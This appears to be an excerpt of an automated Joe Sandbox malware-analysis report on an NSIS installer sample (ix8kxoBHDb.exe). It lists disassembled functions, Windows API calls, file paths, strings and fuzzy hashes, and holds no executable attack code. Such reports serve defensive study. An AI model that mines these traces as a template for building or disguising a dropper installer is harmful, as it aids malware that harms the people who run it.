lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,756F2EE0,00000000), ref: 00405B6B
lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,756F2EE0,00000000), ref: 00405B8E
lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,756F2EE0,00000000), ref: 00405B94
FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,756F2EE0,00000000), ref: 00405BA4
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
FindClose.KERNEL32(00000000), ref: 00405C53

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B08
\*.*, xrefs: 00405B65
0WB, xrefs: 00405B53
"C:\Users\user\Desktop\ix8kxoBHDb.exe", xrefs: 00405AFA

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\ix8kxoBHDb.exe"$0WB$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-63121444
Opcode ID: efe765d34b709223bdb1d712638ee5584c001840e8cac4ec9717a6f7e167d989
Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
Opcode Fuzzy Hash: efe765d34b709223bdb1d712638ee5584c001840e8cac4ec9717a6f7e167d989
Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE

Function 00406AF2 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45

Function 0040672B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,756F2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,756F2EE0), ref: 00406736
FindClose.KERNEL32(00000000), ref: 00406742

Strings

xgB, xrefs: 0040672C

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: xgB
API String ID: 2295610775-399326502
Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C

Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183

Strings

C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker, xrefs: 004021C3

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker
API String ID: 542301482-1454378569
Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54

Function 00403E86 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
ShowWindow.USER32(?), ref: 00403EDF
DestroyWindow.USER32 ref: 00403EF3
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
GetDlgItem.USER32(?,?), ref: 00403F30
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
IsWindowEnabled.USER32(00000000), ref: 00403F4B
GetDlgItem.USER32(?,00000001), ref: 00403FF9
GetDlgItem.USER32(?,00000002), ref: 00404003
SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
GetDlgItem.USER32(?,00000003), ref: 00404114
ShowWindow.USER32(00000000,?), ref: 00404135
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
EnableWindow.USER32(?,?), ref: 00404162
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
EnableMenuItem.USER32(00000000), ref: 0040417F
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
SetWindowTextW.USER32(?,00423728), ref: 004041E8
ShowWindow.USER32(?,0000000A), ref: 0040431C

Strings

tH, xrefs: 00404236
(7B, xrefs: 004041C4

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: (7B$tH
API String ID: 3282139019-2057435674
Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

Function 00403AD8 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,756F3420,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00000000), ref: 00403B59
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\brugser\brugo,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\brugser\brugo,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\brugser\brugo), ref: 00403C40

Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C

RegisterClassW.USER32(004291E0), ref: 00403C7D
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
ShowWindow.USER32(00000005,00000000), ref: 00403D00
GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
RegisterClassW.USER32(004291E0), ref: 00403D42
DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61

Strings

RichEd20, xrefs: 00403D06
_Nb, xrefs: 00403C5C, 00403CC4
C:\Users\user\AppData\Local\Temp\, xrefs: 00403AE4
(7B, xrefs: 00403B04
1033, xrefs: 00403AF8, 00403B54
Call, xrefs: 00403BA0, 00403BA9, 00403BB7, 00403C06, 00403C0C
RichEdit, xrefs: 00403D33
.DEFAULT\Control Panel\International, xrefs: 00403B44
Control Panel\Desktop\ResourceLocale, xrefs: 00403B0C
C:\Users\user\AppData\Roaming\brugser\brugo, xrefs: 00403B68, 00403B70, 00403C13, 00403C19, 00403C29
RichEdit20W, xrefs: 00403D24, 00403D2A
.exe, xrefs: 00403BE6
"C:\Users\user\Desktop\ix8kxoBHDb.exe", xrefs: 00403ADC
RichEd32, xrefs: 00403D14

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\ix8kxoBHDb.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\brugser\brugo$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-735278675
Opcode ID: e3f75488d19024041f1bb343cbf8cb78a09e2a23954cfc0fd164e097734ab2b2
Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
Opcode Fuzzy Hash: e3f75488d19024041f1bb343cbf8cb78a09e2a23954cfc0fd164e097734ab2b2
Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

Function 00402F30 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402F44
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ix8kxoBHDb.exe,00000400), ref: 00402F60

Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\ix8kxoBHDb.exe,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ix8kxoBHDb.exe,C:\Users\user\Desktop\ix8kxoBHDb.exe,80000000,00000003), ref: 00402FA9
GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0

Strings

C:\Users\user\Desktop, xrefs: 00402F8B, 00402F90, 00402F96
soft, xrefs: 00403020
C:\Users\user\AppData\Local\Temp\, xrefs: 00402F3D, 00403108
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
Null, xrefs: 00403029
C:\Users\user\Desktop\ix8kxoBHDb.exe, xrefs: 00402F4A, 00402F59, 00402F6D, 00402F8A
Error launching installer, xrefs: 00402F80
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
"C:\Users\user\Desktop\ix8kxoBHDb.exe", xrefs: 00402F30
Inst, xrefs: 00403017

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\ix8kxoBHDb.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ix8kxoBHDb.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-3694760655
Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

Function 0040640A Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,?,00405487,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000), ref: 0040655E
SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,?,00405487,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000), ref: 0040659A
SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
CoTaskMemFree.OLE32(00000000), ref: 004065B3
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,?,00405487,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000), ref: 00406631

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
Call, xrefs: 00406434, 0040650F, 00406516, 0040651A, 00406534, 00406535, 0040654A, 0040655D, 00406579, 004065A4, 004065D8, 004065DE, 004065FA, 0040660D, 0040662A, 00406630, 0040663C, 0040666F
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll, xrefs: 0040642F

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-2047566092
Opcode ID: 8d374faab8b67e02b20779b8a2e58b36efa0b5910af5fdc4d12e9da804621c5a
Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
Opcode Fuzzy Hash: 8d374faab8b67e02b20779b8a2e58b36efa0b5910af5fdc4d12e9da804621c5a
Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker,?,?,00000031), ref: 004017D5

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

Part of subcall function 00405450: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00402F08,00402F08,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Strings

C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker, xrefs: 0040179E
Call, xrefs: 0040178D, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp, xrefs: 00401821, 0040183F
C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll, xrefs: 00401835, 00401851

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp$C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll$C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker$Call
API String ID: 1941528284-3502929433
Opcode ID: a38fa9d8c0b11b73c4a5c4591007dbfe993cf55f86f9aa7a4ca4efb874b1eb65
Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
Opcode Fuzzy Hash: a38fa9d8c0b11b73c4a5c4591007dbfe993cf55f86f9aa7a4ca4efb874b1eb65
Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

Function 00405450 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
lstrlenW.KERNEL32(00402F08,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00402F08,00402F08,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000), ref: 004054AB
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll), ref: 004054BD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll, xrefs: 00405471, 00405481, 00405487, 004054AA, 004054B6

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
